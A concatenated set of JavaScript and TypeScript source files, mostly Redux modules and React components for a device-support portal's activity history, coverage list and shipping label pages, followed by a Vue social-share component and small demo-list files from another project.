 */
function requestActivities() {
  return { type: REQUEST_ACTIVITIES };
}

/**
 * Builds the action marking a "load more" fetch as started.
 * @return {Object} action
 */
function requestMoreActivities() {
  return { type: REQUEST_MORE_ACTIVITIES };
}

/**
 * Builds the action carrying activity data returned from the server.
 * @param {Object} payload Activity data returned from server
 * @param {Boolean} append Whether to append to, or replace, the stored lists
 * @return {Object} action
 */
function receiveActivities(payload, append) {
  return { type: RECEIVE_ACTIVITIES, payload, append };
}

/**
 * Builds the action toggling the expanded activity list.
 * @param {Boolean} [showMore=true] Whether to show more items or not
 * @return {Object} action
 */
function seeMoreActivityClicked(showMore = true) {
  return { type: SEE_MORE_ACTIVITY, showMore };
}

/**
 * Builds the action toggling the expanded notifications list.
 * @param {Boolean} [showMore=true] Whether to show more items or not
 * @return {Object} action
 */
function seeMoreNotificationsClicked(showMore = true) {
  return { type: SEE_MORE_NOTIFICATIONS, showMore };
}

/**
 * Builds the action clearing all notifications.
 * @return {Object} action
 */
function resetNotifications() {
  return { type: RESET_NOTIFICATIONS };
}

/**
 * All Actions
 * @type {Object}
 */
export const actions = {
  seeMoreActivityClicked,
  seeMoreNotificationsClicked,
  requestActivities,
  requestMoreActivities,
  receiveActivities,
  resetNotifications
};
/**
 * Shapes the raw activity response for the store, deriving notification
 * items from the returned cases.
 * @param {Object} data Raw response ({ cases, bookmark, moreRecords })
 * @return {Object} modified data
 */
const _prepareData = ({ cases, bookmark, moreRecords }) => ({
  cases,
  notifications: getNotificationItems(cases),
  bookmark,
  moreRecords
});
/**
 * Thunk: fetches the activity history (optionally scoped to one device)
 * and dispatches request/receive actions around the call.
 * @param {string} [serialNumberKey=''] Optional device serial-number key filter
 * @return {Function} dispatch
 */
export const fetchAllActivities = (serialNumberKey = '') => dispatch => {
  dispatch(requestActivities());
  // Encode the key so unexpected characters cannot corrupt the query string.
  const apiUrl = serialNumberKey
    ? (`${ACTIVITY_API_URL}?serialNumberKey=${encodeURIComponent(serialNumberKey)}`)
    : ACTIVITY_API_URL;
  return fetchService(apiUrl, {})
    .then(data => {
      dispatch(receiveActivities(_prepareData(data), false));
    })
    .catch(
      ex => {
        // Store an error flag so the list can render an inline error message.
        console.error('Exception while fetching activities. ', ex);
        dispatch(receiveActivities(FETCH_ERROR_DATA, false));
      }
    );
};
/**
 * Thunk: fetches the next page of activities using the pagination bookmark,
 * optionally scoped to one device.
 * @param {string} [bookmark=''] Pagination bookmark from the previous response
 * @param {string} [serialNumberKey=''] Optional device serial-number key filter
 * @return {Function} dispatch
 */
export const fetchMoreActivities = (bookmark = '', serialNumberKey = '') => {
  // Encode both query parameters so unexpected characters cannot corrupt the URL.
  const tempUrl = bookmark ? (`${ACTIVITY_API_URL}?bookmark=${encodeURIComponent(bookmark)}`) : ACTIVITY_API_URL;
  const apiUrl = serialNumberKey
    ? (`${tempUrl + (bookmark ? '&' : '?')}serialNumberKey=${encodeURIComponent(serialNumberKey)}`)
    : tempUrl;
  return dispatch => {
    dispatch(requestMoreActivities());
    return fetchService(apiUrl, {})
      .then(data => {
        dispatch(receiveActivities(_prepareData(data), true));
      })
      .catch(
        ex => {
          console.error('Exception while fetching activities. ', ex);
          // Keep the bookmark and moreRecords so the user can retry "see more".
          dispatch(receiveActivities(Object.assign({}, FETCH_ERROR_DATA, {
            bookmark,
            moreRecords: true
          }), true));
          dispatch(modalActions.showModal(serverErrorMessage));
        }
      );
  };
};
/**
 * Handles REQUEST_ACTIVITIES: flags the initial fetch as in flight.
 * @param {Object} state
 * @param {Object} action
 * @return {Object} new state
 */
const requestActivitiesHandler = (state = {}, action) =>
  action.type === REQUEST_ACTIVITIES
    ? Object.assign({}, state, { isFetching: true })
    : state;
/**
 * Handles REQUEST_MORE_ACTIVITIES: flags a "load more" fetch as in flight.
 * @param {Object} state
 * @param {Object} action
 * @return {Object} new state
 */
const requestMoreActivitiesHandler = (state = {}, action) =>
  action.type === REQUEST_MORE_ACTIVITIES
    ? Object.assign({}, state, { fetchingMore: true })
    : state;
/**
 * Handles RECEIVE_ACTIVITIES: stores fetched cases/notifications (either
 * appending to or replacing the existing lists), clears the fetching flags,
 * and records pagination info.
 * @param {Object} state
 * @param {Object} action
 * @return {Object} new state
 */
const receiveActivitiesHandler = (state = {}, action) => {
  if (action.type !== RECEIVE_ACTIVITIES) {
    return state;
  }
  const { error, bookmark, moreRecords } = action.payload;
  // Number of cases shown before this batch; the UI uses it to focus the
  // first newly loaded item.
  const prevNumOfCases = (state.cases || []).length;

  // When the payload carries a list, append it to (or replace) the current
  // one; otherwise keep whatever the state already holds.
  const mergeList = (incoming, existing) => {
    if (!incoming) {
      return existing;
    }
    return action.append ? (existing || []).concat(incoming) : incoming;
  };

  const notifications = mergeList(action.payload.notifications, state.notifications);
  const cases = mergeList(action.payload.cases, state.cases);

  return Object.assign({}, state, {
    isFetching: false,
    fetchingMore: false,
    fetchComplete: true,
    cases,
    error,
    notifications,
    bookmark,
    moreRecords,
    prevNumOfCases
  });
};
/**
 * Handles RESET_NOTIFICATIONS: empties the notifications list.
 * @param {Object} state
 * @param {Object} action
 * @return {Object} new state
 */
const resetNotificationsHandler = (state = {}, action) =>
  action.type === RESET_NOTIFICATIONS
    ? Object.assign({}, state, { notifications: [] })
    : state;
/**
 * Handles SEE_MORE_ACTIVITY: records whether the expanded activity list
 * should be shown.
 * NOTE(review): like the original, this also copies any own keys of
 * `state.activityData` onto the top level of the state; confirm whether
 * that merge is still needed.
 * @param {Object} state
 * @param {Object} action
 * @return {Object} new state
 */
const seeMoreActivityHandler = (state = {}, action) => {
  if (action.type !== SEE_MORE_ACTIVITY) {
    return state;
  }
  const overlay = Object.assign({}, state.activityData, {
    showMoreActivities: action.showMore
  });
  return Object.assign({}, state, overlay);
};
/**
 * Handles SEE_MORE_NOTIFICATIONS: records whether the expanded notifications
 * list should be shown.
 * NOTE(review): like the original, this also copies any own keys of
 * `state.activityData` onto the top level of the state; confirm whether
 * that merge is still needed.
 * @param {Object} state
 * @param {Object} action
 * @return {Object} new state
 */
const seeMoreNotificationsHandler = (state = {}, action) => {
  if (action.type !== SEE_MORE_NOTIFICATIONS) {
    return state;
  }
  const overlay = Object.assign({}, state.activityData, {
    showMoreNotifications: action.showMore
  });
  return Object.assign({}, state, overlay);
};
/**
 * All Action Handlers
 * Maps each action type to the reducer-handler that processes it.
 * @type {Object}
 */
const ACTION_HANDLERS = {
  [REQUEST_ACTIVITIES]: requestActivitiesHandler,
  [REQUEST_MORE_ACTIVITIES]: requestMoreActivitiesHandler,
  [RECEIVE_ACTIVITIES]: receiveActivitiesHandler,
  [SEE_MORE_ACTIVITY]: seeMoreActivityHandler,
  [SEE_MORE_NOTIFICATIONS]: seeMoreNotificationsHandler,
  [RESET_NOTIFICATIONS]: resetNotificationsHandler
};
/**
 * Reducers
 */
// Default activity-module state before any fetch has happened.
export const initialState = {
  fetchComplete: false, // true once the first fetch resolves (even on error)
  showMoreActivities: false, // expanded state of the activity list
  showMoreNotifications: false, // expanded state of the notifications list
  cases: [],
  error: false,
  notifications: [],
  bookmark: 0, // pagination bookmark returned by the server
  moreRecords: false // server indicates more pages are available
};
/**
 * Root reducer for the activity module: delegates to the handler registered
 * for the action type, or returns the state unchanged.
 * @param {Object} [state=initialState]
 * @param {Object} action
 * @return {Object} new state
 */
const reducer = (state = initialState, action) => {
  const handle = ACTION_HANDLERS[action.type];
  if (handle) {
    return handle(state, action);
  }
  return state;
};

export default reducer;
<file_sep>/src/components/ActivityList/ActivityList.js
import React from 'react';
import PropTypes from 'prop-types';
import { FormattedMessage } from 'react-intl';
import { metrics } from '../../metrics/AnalyticsService';
import ActivityItem from '../ActivityItem';
import { focusElement } from '../../services/utilities';
import { activityList as messages } from '../../messages/messages';
import './ActivityList.scss';
/**
 * Initial items to show on render (collapsed state).
 * @type {number}
 * @constant
 * @memberOf ActivityList
 */
const MIN_ITEMS = 3;

/**
 * Id prefix for selecting for accessibility.
 * Combined with the item index to form each activity item's DOM id.
 * @type {string}
 * @constant
 * @memberOf ActivityList
 */
const ITEM_ID_PREFIX = 'activity-item-';
/**
 * Shows a list of activities with options to expand if total number is fewer than maxItemsToShow.
 * Renders, in order of precedence: a spinner while fetching, an inline error,
 * the (possibly truncated) list with a show-more control, or a "no history" message.
 * @param {Object} activities - Object containing activity data from redux store
 * @param {Function} onShowMoreClick - Handler for clicking the button to expand the list
 * @param {number} maxItemsToShow - Maximum items to show at a time
 * @returns {XML}
 * @constructor
 */
const ActivityList = ({ activities, onShowMoreClick, maxItemsToShow }) => {
  if (activities.isFetching) {
    return <div className='loading' />;
  }
  if (activities.error) {
    return (<div className='activity-error'><FormattedMessage {...messages.fetchError} /></div>);
  }
  const showMore = activities.showMoreActivities;
  const activityList = activities.cases;
  const hasMoreRecords = activities.moreRecords;
  const itemCount = activityList.length;

  // Button text to show more or show less devices
  const showMoreElement = () => {
    if (showMore) {
      return <FormattedMessage {...messages.seeLess} />;
    } else if (hasMoreRecords || (itemCount > maxItemsToShow)) {
      // More items exist than can be expanded inline; link to the full page.
      return <FormattedMessage {...messages.seeAll} />;
    }
    return <FormattedMessage {...messages.showAll} />;
  };

  const manageFocus = () => {
    // a11y: programmatically move the focus to the first of newly loaded activity
    // use timeout of 100ms for VO to correctly get the focus and
    // also allow time for activities to load
    window.setTimeout(() => {
      const newItem = document.querySelector(`#${ITEM_ID_PREFIX}${MIN_ITEMS} h3`);
      focusElement(newItem);
    }, 100);
  };

  // Chooses between: nothing (list fits within MIN_ITEMS), a link to
  // /activity (server holds more records than we can expand inline), or an
  // expand/collapse button that also tracks the interaction.
  const showMoreLink = () => {
    const linkIconClass = showMore ? 'icon-resetcircle' : 'icon-pluscircle';
    if (activityList.length <= MIN_ITEMS && !hasMoreRecords) {
      return <div className='empty-area' />;
    } else if (hasMoreRecords || itemCount > maxItemsToShow) {
      return (
        <div className='see-more-link'>
          <a href='/activity' className='icon icon-after icon-chevronright'>
            {showMoreElement(itemCount, showMore)}
          </a>
        </div>
      );
    }
    return (
      <div className='see-more-link'>
        <button
          aria-expanded={showMore}
          className={`icon icon-after ${linkIconClass}`}
          onClick={e => {
            metrics.trackEvent({
              page: {
                content_subtype: 'Expand::History Landing Page'
              }
            });
            e.preventDefault();
            onShowMoreClick(!showMore);
            if (!showMore) {
              manageFocus();
            }
          }}
        >
          {showMoreElement()}
        </button>
      </div>
    );
  };

  if (activityList && activityList.length) {
    const visibleItems = activityList.slice(0, showMore ? maxItemsToShow : MIN_ITEMS);
    return (
      <div className='activity-wrapper'>
        <div className='activity-list'>
          {visibleItems.map((activityData, i) => (
            <ActivityItem
              activityData={activityData}
              key={activityData.caseId}
              id={ITEM_ID_PREFIX + i}
              className={(!showMore && i >= MIN_ITEMS) ? 'hide' : ''}
            />
          ))}
        </div>
        {showMoreLink()}
      </div>
    );
  }
  return (<div className='no-history'><FormattedMessage {...messages.noData} /></div>);
};
ActivityList.propTypes = {
  activities: PropTypes.object.isRequired,
  onShowMoreClick: PropTypes.func,
  maxItemsToShow: PropTypes.number.isRequired
};

// onShowMoreClick is only needed when the expand/collapse button is
// rendered, so it is optional.
ActivityList.defaultProps = {
  onShowMoreClick: undefined
};

export default ActivityList;
<file_sep>/src/components/ActivityItem/index.js
// Barrel file: re-export the ActivityItem component for shorter import paths.
import ActivityItem from './ActivityItem';

export default ActivityItem;
<file_sep>/src/components/AgreementConfirmation/AgreementConfirmation.js
import React from 'react';
import CSSTransitionGroup from 'react-transition-group/CSSTransitionGroup';
import AppleCareImage from '../AppleCareImage';
import PageTitle from '../PageTitle';
import NavigationLink from '../NavigationLink';
import { agreementConfirmation as messages } from '../../messages/messages';
import './AgreementConfirmation.scss';
/**
 * Confirmation page for once a user has registered an agreement. It will be displayed on the same route
 * as the registration form itself after submission and validation.
 * Fades in on mount via CSSTransitionGroup (appear-only; enter/leave disabled).
 * @returns {XML}
 * @constructor
 */
const AgreementConfirmation = () => {
  // Pixel size of the AppleCare badge image.
  const appleCareImageSize = 90;
  return (
    <CSSTransitionGroup
      transitionName='component-mount'
      transitionAppear
      transitionAppearTimeout={400}
      transitionEnter={false}
      transitionLeave={false}
      component='div'
      className='agreement-confirmation'
    >
      <div className='applecare-container'>
        <AppleCareImage size={appleCareImageSize} />
      </div>
      <div className='page-title-container'>
        <PageTitle title={messages.title} subheading={messages.subhead} />
      </div>
      <div className='go-to-mysupport content-area'>
        <NavigationLink />
      </div>
    </CSSTransitionGroup>
  );
};

export default AgreementConfirmation;
<file_sep>/src/components/ActivityList/__stories__/ActivityList.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import { action } from '@storybook/addon-actions';
import ActivityList from '../ActivityList';
import ACTIVITY_DATA from '../../../__mock__/activity-list.json';
// Storybook: ActivityList collapsed (initial) and expanded, fed by mock data.
storiesOf('Activity List', module)
  .add('Initial State', () => (
    <ActivityList activities={ACTIVITY_DATA} maxItemsToShow={12} onShowMoreClick={action('Show more clicked')} />
  ))
  .add('More Items Shown', () => (
    <ActivityList
      maxItemsToShow={12}
      onShowMoreClick={action('Show more clicked')}
      activities={Object.assign({}, ACTIVITY_DATA, { showMoreActivities: true })}
    />
  ));
<file_sep>/src/routes/ShippingLabel/components/ShippingLabel.js
import PropTypes from 'prop-types';
import React from 'react';
import { FormattedHTMLMessage } from 'react-intl';
import Address from '../../../components/Address';
import { shippingLabel as messages } from '../../../messages/messages';
import HEADING_IMAGE from './images/eParcel_header.jpg';
import './ShippingLabel.scss';
/**
* creates barcode image
*/
const getBarcodeImage = imageData => {
if (imageData) {
return (<img src={`data:image/gif;base64,${imageData}`} alt='' className='barcode' />);
}
return (<span className='barcode'>barcode loading ...</span>);
};
/**
* Component defining the route for displaying shipping Label
* @param {Object} barcodeData
* @param {Object} shippingAddress
* @param {Object} returnAddress
* @param {String} dispatchId
* @param {func} trackPageView
* @returns {XML}
* @constructor
*/
const ShippingLabel = props => {
// send omniture page load event
props.trackPageView();
return (
<div className='shipping-label-wrapper'>
<div className='shipping-label-instructions'>
<FormattedHTMLMessage {...messages.instructions} />
</div>
<div className='shipping-label'>
<div className='header'>
<img alt='' src={HEADING_IMAGE} />
<h1 className='header-main'>eParcel POST RETURNS</h1>
<h2 className='header-sub'>For Post Office Use: Scan Barcode. No Payment Required.</h2>
</div>
<div className='post-to-address'>
<div className='header-send-to'>DELIVERY TO</div>
<Address {...props.shippingAddress} />
</div>
<div className='delivery-instuction-head text-5'>DELIVERY INSTRUCTIONS</div>
<div className='delivery-instuction-body text-6'>
DELIVER THE PACKAGE TO THE RECEIVING DOCK, PLEASE RING THE BELL FOR ATTENDANCE.
DO NOT LEAVE THE PACKAGE UNATTENDED
</div>
<div className='signature-block'>
<div className=''>SIGNATURE ON DELIVERY REQUIRED  PARCEL 1 OF 1</div>
</div>
<div className='barcode-wrapper'>
<div className='articleId'>AP Article Id: {props.barcodeData.articleId}</div>
<div className='barcode-image'>{getBarcodeImage(props.barcodeData.barcodeImage)}</div>
<div className='articleId'>AP Article Id: {props.barcodeData.articleId}</div>
</div>
<div className='post-from-address'>
<div className='text-5'>SENDER</div>
<div className='dispatchId'>{props.dispatchId}</div>
<Address {...props.returnAddress} />
</div>
</div>
<div className='shipping-label-notes'>
<FormattedHTMLMessage {...messages.notes} />
</div>
</div>
);
};
// returnAddress is optional: the label can render before it is available
// (Address tolerates missing fields via its defaultProps).
ShippingLabel.propTypes = {
  barcodeData: PropTypes.object.isRequired,
  dispatchId: PropTypes.string.isRequired,
  shippingAddress: PropTypes.object.isRequired,
  returnAddress: PropTypes.object,
  trackPageView: PropTypes.func.isRequired
};

export default ShippingLabel;
<file_sep>/src/containers/AppContainer.js
import PropTypes from 'prop-types';
import React, { Component } from 'react';
import { browserHistory, Router } from 'react-router';
import { Provider } from 'react-intl-redux'; // Wraps the IntlProvider of react-intl with the Provider for react-redux
/**
 * Main container wrapping all routes and components.
 * Scrolls to the top of the page on every route update.
 * @param {Object} routes
 * @param {Object} store
 * @returns {XML}
 * @class
 */
class AppContainer extends Component {
  static propTypes = {
    routes: PropTypes.object.isRequired,
    store: PropTypes.object.isRequired
  };

  // The routes/store props never change after the initial mount, so
  // re-rendering this shell is unnecessary; Router manages its own updates.
  shouldComponentUpdate() {
    return false;
  }

  render() {
    const { routes, store } = this.props;
    return (
      <Provider store={store}>
        <div className='app-root'>
          <Router onUpdate={() => window.scrollTo(0, 0)} history={browserHistory} >
            {routes}
          </Router>
        </div>
      </Provider>
    );
  }
}

export default AppContainer;
<file_sep>/src/layouts/BasicLayout/components/BasicLayout.js
import PropTypes from 'prop-types';
import React from 'react';
import GlobalFooter from '../../../components/GlobalFooter';
import './BasicLayout.scss';
/**
 * Layout that only renders the provided content and Global Footer. Mainly used for error pages
 * @param children
 * @constructor
 */
// NOTE(review): relies on the browser global `location` for the footer's
// return URL; confirm this layout is never server-rendered.
const BasicLayout = ({ children }) => (
  <div className='container text-center'>
    <div className='basic-layout__viewport'>
      {children}
    </div>
    <GlobalFooter returnUrl={location.pathname} />
  </div>
);

BasicLayout.propTypes = {
  children: PropTypes.element.isRequired
};

export default BasicLayout;
<file_sep>/src/components/CoverageList/index.js
// Barrel file: re-export the CoverageList component for shorter import paths.
import CoverageList from './CoverageList';

export default CoverageList;
<file_sep>/src/components/ActivityItem/ActivityItem.js
import React from 'react';
import PropTypes from 'prop-types';
import FormattedText from '../FormattedText';
import { itemDescription, isNotificationItem } from '../../services/notificationService';
import { EXIT_EVENT, EXIT_EVENT_VALUES } from '../../metrics/AnalyticsService';
import { activityItem as messages } from '../../messages/messages';
import './ActivityItem.scss';
/**
* Display a single activity item
* @param {Object} activityData - Data related to the current activity
* @param {string} [className=''] - Additional class names to use for the activity item
* @param {string} [id=''] - Id to use for the activity item
* @param {boolean} [allActivities=false] - If the current page is All Activity or not
* @returns {XML}
* @constructor
*/
const ActivityItem = ({ activityData, className, id, allActivities }) => {
// Prefix the case title with the product name when one is attached.
const prodName = activityData.product && activityData.product.productName;
const caseTitle = prodName
? (`${prodName}: ${activityData.caseTitle}`)
: activityData.caseTitle;
// Heading level differs so the page outline stays correct: h2 on the
// All Activity page, h3 when embedded elsewhere.
const activityTitle = allActivities
? (<h2 className='activity-header'>
{caseTitle}
</h2>)
: (<h3 className='activity-header'>
{caseTitle}
</h3>);
return (
<div id={id} className={`activity-item ${className}`}>
<div className='activity-header-row'>
{activityTitle}
</div>
{activityData.solutions.map((solution, i) => {
const solutionId = solution.solutionId;
// Ids tie the visible link text to its screen-reader-only case title
// via aria-labelledby below.
const linkId = `al-${solutionId}-${i}`;
const a11yId = `aa-${solutionId}-${i}`;
// Notification items get a subtype icon, optionally with an alert badge;
// everything else renders no icon class.
const iconClass = isNotificationItem(solution) // eslint-disable-line no-nested-ternary
? (solution.hasAlert
? `has-alert ${solution.solutionSubType}`
: solution.solutionSubType)
: '';
// 'OtherRepair' solutions link to the internal repair-details page;
// all others redirect out to CAS in a new window and fire exit metrics.
const seeDetailsLink = (solution.solutionSubType === 'OtherRepair')
? (<a
className='notification-link icon icon-after icon-chevronright'
href={`/repairs/details/${solution.repairId}`}
>
<span
role='text' // eslint-disable-line jsx-a11y/aria-role
>
<FormattedText {...messages.seeDetails} />
<span className='a11y'>{caseTitle}</span>
</span>
</a>)
: (<a
target='_blank'
aria-labelledby={`${linkId} ${a11yId} new-window`}
className='notification-link icon icon-after icon-chevronright'
data-metrics-event-name={EXIT_EVENT}
data-metrics-event-value={EXIT_EVENT_VALUES.cas}
href={solution.redirectUrl}
>
<span
role='text' // eslint-disable-line jsx-a11y/aria-role
>
<FormattedText htmlId={linkId} {...messages.seeDetails} />
<span id={a11yId} className='a11y'>{caseTitle}</span>
</span>
</a>);
return (
<div key={solutionId} className='activity-item-row'>
<div className='activity-details'>
<div className='left-col'>
<span className={`icon ${iconClass}`} />
<div className='activity-subheader'>
{solution.solutionTitle}
</div>
{itemDescription(solution, 'activity')}
</div>
<div className='right-col activity-link-wrapper'>
{seeDetailsLink}
</div>
</div>
</div>
);
})}
</div>
);
};
ActivityItem.propTypes = {
activityData: PropTypes.object.isRequired,
className: PropTypes.string,
id: PropTypes.string,
allActivities: PropTypes.bool
};
ActivityItem.defaultProps = {
className: '',
id: '',
allActivities: false
};
export default ActivityItem;
<file_sep>/src/routes/ShippingLabel/index.js
/* eslint-disable global-require */
import { injectReducer } from 'store/reducers';
/**
 * Route factory for the shipping label page. Lazily loads the container and
 * registers its reducer the first time the route matches.
 * @param {Object} store - Redux store to inject the reducer into.
 */
export default store => ({
path: '/repairs/shippingLabel/dispatchId/:dispatchId',
/* Async getComponent is only invoked when route matches */
getComponent(nextState, callback) {
/*
 * Webpack - use import() to create a split point and embed
 * an async module loader (jsonp) when bundling
 */
return import(/* webpackChunkName: "shipping-label" */ './containers/ShippingLabelContainer')
.then(ShippingLabel => {
const shippingLabelReducer = require('../../modules/shippinglabel').default;
/* Add the reducer to the store on key 'shippingLabelData' */
injectReducer(store, {
key: 'shippingLabelData',
reducer: shippingLabelReducer
});
return callback(null, ShippingLabel.default);
})
.catch(err => {
// Chunk failed to load (network / bad deploy): log only; the router is
// never called back, so the route simply does not resolve.
console.error('Dynamic page loading of shipping label failed. ', err);
});
}
});
<file_sep>/src/modules/shippinglabel.js
/**
* Redux actions and handlers related to shipping label
* @module proofofcoverage
*/
import { metrics } from '../metrics/AnalyticsService';
/**
 * Constants
 */
export const SHIPPING_LABEL_DATA_LOADED = 'SHIPPING_LABEL_DATA_LOADED';
/**
 * Actions
 */
/**
 * Build the action dispatched once shipping label data is available.
 * @param {Object} [data={}] - Shipping label payload from the API.
 * @returns {{type: string, payload: Object}} Redux action.
 */
function shippingLabelDataLoaded(data = {}) {
  return {
    type: SHIPPING_LABEL_DATA_LOADED,
    payload: data
  };
}
export const actions = {
  shippingLabelDataLoaded
};
/**
 * Action Handlers
 */
// Each handler maps (state, action) -> next state. The data-loaded handler
// replaces the whole slice with the payload, keeping the old state when the
// payload is missing/falsy.
const ACTION_HANDLERS = {
[SHIPPING_LABEL_DATA_LOADED]: (state = {}, action) => (action.payload ? action.payload : state)
};
/**
 * send a page load omniture event
 * Fire-and-forget: identifies the Australia Post label page to analytics;
 * no state is read or written.
 */
export const trackPageView = () => {
metrics.trackPage({
page: {
content_subtype: 'AUS_Post_Label_Load'
}
});
};
/**
 * Reducers
 */
export const initialState = {
  barcodeData: {},
  dispatchId: '',
  shippingAddress: {},
  returnAddress: {}
};
/**
 * Shipping label reducer: delegates to the registered handler for the
 * action type, or returns the current state untouched.
 * @param {Object} [state=initialState] - Current slice state.
 * @param {Object} action - Dispatched redux action.
 * @returns {Object} Next slice state.
 */
function reducer(state = initialState, action) {
  const handle = ACTION_HANDLERS[action.type];
  if (handle) {
    return handle(state, action);
  }
  return state;
}
export default reducer;
<file_sep>/src/components/CoverageList/CoverageList.js
import React from 'react';
import PropTypes from 'prop-types';
import { FormattedMessage, FormattedHTMLMessage } from 'react-intl';
import { isEmpty } from 'lodash';
import CoverageItem from '../CoverageItem';
import { coverageList as messages } from '../../messages/messages';
import './CoverageList.scss';
/**
* Renders all coverage items for a given product. Used in product details page
* @param {Object} coverage - Object with data on coverage specific to the given product
* @param {Function} [onMount] - Function to be run on initial mount
* @param {Function} onViewPOCClick - Handler for when user clicks on button to view their POC
* @param {Object} userData - Redux object containing current user data
* @param {Object} device - Contains data for the current device
* @param {number} deviceIndex - Index of the current device in the product list
* @param {string} agreementsUrl - Url to deep dive to agreement sales
* @returns {XML}
* @class
*/
class CoverageList extends React.Component {
// Lets the container trigger a coverage fetch (or metrics) on first mount.
componentDidMount() {
const { onMount } = this.props;
if (onMount) {
onMount();
}
}
render() {
const { coverage, onViewPOCClick, userData, device, deviceIndex,
onExtendCoverageClick, agreementsUrl, onPurchaseAgreementClick } = this.props;
const { isFetching, data } = coverage;
// Treat "not yet requested" (isFetching undefined) the same as in-flight.
if (isFetching || typeof isFetching === 'undefined') {
return <div className='loading' />;
} else if (data && data.error) {
return (
<div className='coverage-list'>
<div className='no-coverage'>
{data.error}
</div>
</div>
);
} else if (data && !isEmpty(data)) {
const { agreementsEligibility, coverageSummary, purchaseDateInfo, supportCoverage, repairCoverage } = data;
// Primary coverage row: agreement-sales eligibility wins over the plain
// coverage summary; summaries of type NONE/UNKNOWN render nothing.
const coverageSection = () => {
if (agreementsEligibility && !isEmpty(agreementsEligibility)) {
return (
<CoverageItem
coverageData={agreementsEligibility}
userData={userData}
onViewPOCClick={onViewPOCClick}
device={device}
deviceIndex={deviceIndex}
onExtendCoverageClick={onExtendCoverageClick}
agreementsUrl={agreementsUrl}
onPurchaseAgreementClick={onPurchaseAgreementClick}
/>
);
} else if (coverageSummary && coverageSummary.type !== 'NONE' && coverageSummary.type !== 'UNKNOWN') {
return (
<CoverageItem
coverageData={coverageSummary}
userData={userData}
onViewPOCClick={onViewPOCClick}
device={device}
deviceIndex={deviceIndex}
onExtendCoverageClick={onExtendCoverageClick}
/>
);
}
return null;
};
// Optional secondary rows render only when the API returned them.
return (
<div className='coverage-list'>
{coverageSection()}
{purchaseDateInfo &&
<CoverageItem coverageData={purchaseDateInfo} userData={userData} />
}
{supportCoverage &&
<CoverageItem
coverageData={supportCoverage}
userData={userData}
exitEvent='Product_Details::Exit_to_CAS'
/>
}
{repairCoverage &&
<CoverageItem
coverageData={repairCoverage}
userData={userData}
exitEvent='Product_Details::Exit_to_Set_Up_Repair'
/>
}
<div className='coverage-disclaimer'>
<FormattedHTMLMessage {...messages.disclaimerText} />
</div>
</div>
);
}
// No data at all (and not fetching): generic empty-state message.
return (
<div className='coverage-list'>
<div className='no-coverage'>
<FormattedMessage {...messages.noData} />
</div>
</div>
);
}
}
CoverageList.propTypes = {
coverage: PropTypes.object.isRequired,
onMount: PropTypes.func,
onViewPOCClick: PropTypes.func.isRequired,
onExtendCoverageClick: PropTypes.func.isRequired,
userData: PropTypes.object.isRequired,
device: PropTypes.object.isRequired,
deviceIndex: PropTypes.number.isRequired,
agreementsUrl: PropTypes.string.isRequired,
onPurchaseAgreementClick: PropTypes.func
};
CoverageList.defaultProps = {
onMount: undefined,
onPurchaseAgreementClick: undefined
};
export default CoverageList;
| 921040b81c7b620f1f35840d053d4bdbf59af2d5 | [
"JavaScript"
] | 24 | JavaScript | dheerajui/React | e7579b7f87b728f409ebf7f3956d12d0ae26f6b4 | c4ef53217fd37d00c902b605e9c2dbfc710f2fe9 |
refs/heads/master | <file_sep>export enum musicalInstruments {
drum,
piano,
}
// Keyboard binding plus audio source for one drum/piano pad:
// keyCode/keyTrigger identify the key, id labels the pad, url is the sample.
export interface voiceItem {
keyCode: number;
keyTrigger: string;
id: string;
url: string;
}
<file_sep>export default {
// Accepts named slots matching the share templates below and renders a
// clickable node for each one.
render(h) {
let vm = this;
let slotsList = Object.entries(this.$slots);
// Dynamically build a node and a click handler for every slot passed in.
let arr = slotsList.map(([key, value]) => {
let nodeOption = {
on: {
click() {
// Open this platform's share URL in a resizable popup window.
window.open(vm.shareURLData[key], "_blank", "resizable=yes");
},
},
};
// Render to virtual DOM.
return h("div", nodeOption, value);
});
return h("div", arr);
},
data() {
return {
// Share-URL templates per platform. {{TOKEN}} placeholders are filled
// from the `config` prop (lower-cased keys) in `shareURLData` below.
shareTemplate: {
qzone:
"http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url={{URL}}&title={{TITLE}}&desc={{DESCRIPTION}}&summary={{SUMMARY}}&site={{SOURCE}}&pics={{IMAGE}}",
qq:
'http://connect.qq.com/widget/shareqq/index.html?url={{URL}}&title={{TITLE}}&source={{SOURCE}}&desc={{DESCRIPTION}}&pics={{IMAGE}}&summary="{{SUMMARY}}"',
weibo:
"https://service.weibo.com/share/share.php?url={{URL}}&title={{TITLE}}&pic={{IMAGE}}&appkey={{WEIBOKEY}}",
wechat: "javascript:",
douban:
"http://shuo.douban.com/!service/share?href={{URL}}&name={{TITLE}}&text={{DESCRIPTION}}&image={{IMAGE}}&starid=0&aid=0&style=11",
linkedin:
"http://www.linkedin.com/shareArticle?mini=true&ro=true&title={{TITLE}}&url={{URL}}&summary={{SUMMARY}}&source={{SOURCE}}&armin=armin",
facebook: "https://www.facebook.com/sharer/sharer.php?u={{URL}}",
twitter:
"https://twitter.com/intent/tweet?text={{TITLE}}&url={{URL}}&via={{ORIGIN}}",
},
};
},
props: {
// Page metadata used to fill the URL templates (title, url, desc, ...).
config: {
type: Object,
default() {
return { title: "test", url: "test11", desc: "测试用" };
},
},
},
computed: {
// Resolved share URLs: every {{TOKEN}} replaced with config[token], or
// the literal "none" when the config has no matching (falsy) entry.
shareURLData() {
let vm = this;
return Object.entries(this.shareTemplate).reduce((acc, [key, value]) => {
acc[key] = value.replace(/\{\{(\w*)\}\}/g, function(match, p1) {
p1 = p1.toLowerCase();
return vm.config[p1] || "none";
});
return acc;
}, {});
},
},
};
<file_sep>const baseUrl = "./exercise";
// Paths to the built (docs/) page of each exercise demo.
const randomQuoteMachine = baseUrl + "/random-quote-machine/docs/index.html";
const markdownPreviewer = baseUrl + "/markdown-previewer/docs/index.html";
const drumPiano = baseUrl + "/drum/docs/index.html";
const calculator = baseUrl + "/calculator/docs/index.html";
const pomodoroClock = baseUrl + "/pomodoro-clock/docs/index.html";
// Map of demo name -> demo page URL, consumed by exerciseList.
export default {
randomQuoteMachine,
markdownPreviewer,
drumPiano,
calculator,
pomodoroClock,
};
<file_sep>import srcData from "./demoSrc";
import { Exercise } from "@/type";
// One Exercise per demoSrc entry: [title, src] -> Exercise(title, src).
export const exerciseList = Object.entries(srcData).map(
([title, src]) => new Exercise(title, src)
);
<file_sep>import { CalculatorButton, buttonType } from "@/type.ts";
const buttonList: CalculatorButton[] = [];
/**
